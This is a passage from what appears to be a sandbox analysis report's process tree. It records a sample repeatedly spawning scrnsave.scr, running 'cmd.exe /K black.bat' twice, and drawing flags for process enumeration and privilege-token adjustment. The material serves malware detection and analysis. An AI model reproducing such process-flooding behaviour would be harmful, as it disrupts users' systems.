- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2596
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2776
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2436
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2972
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2880
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2592
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3064
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2680
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2128
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2708
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3052
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:700
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2140
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2224
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2336
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2568
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2132
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2564
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:976
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2864
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2684
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1648
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2128
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2792
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2708
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2232
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:992
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:300
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2272
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2396
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2156
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2152
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2800
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2608
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1848
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2144
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2792
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2912
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1924
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1592
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1756
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1324
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:692
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2204
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2264
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1280
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1384
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3028
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2876
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2640
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2424
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3064
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2232
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2756
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3012
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2444
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2260
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2612
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2328
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2916
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2300
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2128
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1424
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2956
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2160
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2924
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2228
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3004
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3052
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2960
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2676
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2832
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2880
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2808
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2204
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2932
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3048
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2064
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2684
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2236
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2084
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2908
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2568
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2140
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2328
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2988
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3020
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2216
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1596
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2440
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2852
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2700
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2608
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2880
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1424
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1324
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2960
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2196
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2916
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:976
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3032
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1596
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2972
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2380
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2480
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2376
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2608
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:564
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2584
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2688
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:668
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2636
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1488
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2188
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2676
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3020
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1620
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2380
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3028
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2816
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2456
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:700
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2780
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:1780
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:1512
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1384
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1624
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1848
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1984
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:520
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2152
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2248
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2368
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2752
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2800
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2848
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2948
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2992
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2232
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2380
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2284
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2440
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2580
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2628
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2720
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2776
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2932
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:632
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2604
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2700
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2064
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2692
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2836
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2824
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2420
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2876
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2752
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3032
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2324
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2424
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1924
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:836
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:632
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:684
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2248
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2676
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2328
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:692
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2716
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2860
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1384
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1424
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2624
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2144
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2084
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2940
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2936
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2332
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
